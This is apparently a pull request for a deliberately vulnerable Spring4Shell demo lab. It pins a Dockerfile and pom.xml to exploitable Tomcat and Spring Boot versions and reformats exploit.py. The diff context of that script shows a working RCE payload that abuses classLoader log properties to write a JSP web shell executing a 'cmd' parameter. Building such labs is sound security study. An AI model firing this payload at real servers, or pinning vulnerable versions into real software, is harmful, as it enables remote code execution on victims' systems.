### PR TITLE
fix dockerfile to contain a vulnerable version of tomcat and pin it

### DIFF
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,10 +1,11 @@
-FROM tomcat:9.0
+# Pin our tomcat version to something that has not been updated to remove the vulnerability
+# https://hub.docker.com/layers/tomcat/library/tomcat/9.0.59-jdk11/images/sha256-383a062a98c70924fb1b1da391a054021b6448f0aa48860ae02f786aa5d4e2ad?context=explore
+FROM lunasec/tomcat-9.0.59-jdk11
 
 ADD src/ /helloworld/src
 ADD pom.xml /helloworld
 
 #  Build spring app
-
 RUN apt update && apt install maven -y
 WORKDIR /helloworld/
 RUN mvn clean package
@@ -12,7 +13,5 @@ RUN mvn clean package
 #  Deploy to tomcat
 RUN mv target/helloworld.war /usr/local/tomcat/webapps/
 
-
 EXPOSE 8080
 CMD ["catalina.sh", "run"]
-

--- a/exploit.py
+++ b/exploit.py
@@ -6,7 +6,7 @@ import argparse
 from urllib.parse import urlparse
 import time
 
-#Set to bypass errors if the target site has SSL issues
+# Set to bypass errors if the target site has SSL issues
 requests.packages.urllib3.disable_warnings()
 
 post_headers = {
@@ -20,13 +20,12 @@ get_headers = {
     "c": "Runtime",
 }
 
+
 def run_exploit(url, directory, filename):
-
-
     log_pattern = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20" \
-           f"java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter" \
-           f"(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B" \
-           f"%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di"
+                  f"java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter" \
+                  f"(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B" \
+                  f"%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di"
 
     log_file_suffix = "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"
     log_file_dir = f"class.module.classLoader.resources.context.parent.pipeline.first.directory={directory}"
@@ -34,7 +33,6 @@ def run_exploit(url, directory, filename):
     log_file_date_format = "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
 
     exp_data = "&".join([log_pattern, log_file_suffix, log_file_dir, log_file_prefix, log_file_date_format])
-
 
     # Setting and unsetting the fileDateFormat field allows for executing the exploit multiple times
     # If re-running the exploit, this will create an artifact of {old_file_name}_.jsp
@@ -66,7 +64,7 @@ def run_exploit(url, directory, filename):
 
 def main():
     parser = argparse.ArgumentParser(description='Spring Core RCE')
-    parser.add_argument('--url',help='target url', required=True)
+    parser.add_argument('--url', help='target url', required=True)
     parser.add_argument('--file', help='File to write to [no extension]', required=False, default="shell")
     parser.add_argument('--dir', help='Directory to write to. Suggest using "webapps/[appname]" of target app',
                         required=False, default="webapps/ROOT")

--- a/pom.xml
+++ b/pom.xml
@@ -10,9 +10,9 @@
 	</parent>
 	<packaging>war</packaging>
 	<groupId>com.example</groupId>
-	<artifactId>handling-form-submission-complete</artifactId>
+	<artifactId>spring4shell-vulnerable-application</artifactId>
 	<version>0.0.1-SNAPSHOT</version>
-	<name>handling-form-submission-complete</name>
+	<name>Spring4Shell Vulnerable Application</name>
 	<description>Demo project for Spring Boot</description>
 	<properties>
 		<java.version>1.8</java.version>
@@ -21,21 +21,25 @@
 		<dependency>
 			<groupId>org.springframework.boot</groupId>
 			<artifactId>spring-boot-starter-thymeleaf</artifactId>
+			<version>2.6.3</version>
 		</dependency>
 		<dependency>
 			<groupId>org.springframework.boot</groupId>
 			<artifactId>spring-boot-starter-web</artifactId>
+			<version>2.6.3</version>
 		</dependency>
 
 		<dependency>
 			<groupId>org.springframework.boot</groupId>
 			<artifactId>spring-boot-starter-test</artifactId>
+			<version>2.6.3</version>
 			<scope>test</scope>
 		</dependency>
 
 		<dependency>
 			<groupId>org.springframework.boot</groupId>
 			<artifactId>spring-boot-starter-tomcat</artifactId>
+			<version>2.6.3</version>
 			<scope>provided</scope>
 		</dependency>
 	</dependencies>
@@ -46,6 +50,7 @@
 			<plugin>
 				<groupId>org.springframework.boot</groupId>
 				<artifactId>spring-boot-maven-plugin</artifactId>
+				<version>2.6.3</version>
 			</plugin>
 		</plugins>
 	</build>


### PR DESCRIPTION
Pushes to the Tomcat docker images have made it so the exploit fails. I have changed the version to a recent, but still vulnerable base image. I have also mirrored the image so that this doesn't happen again.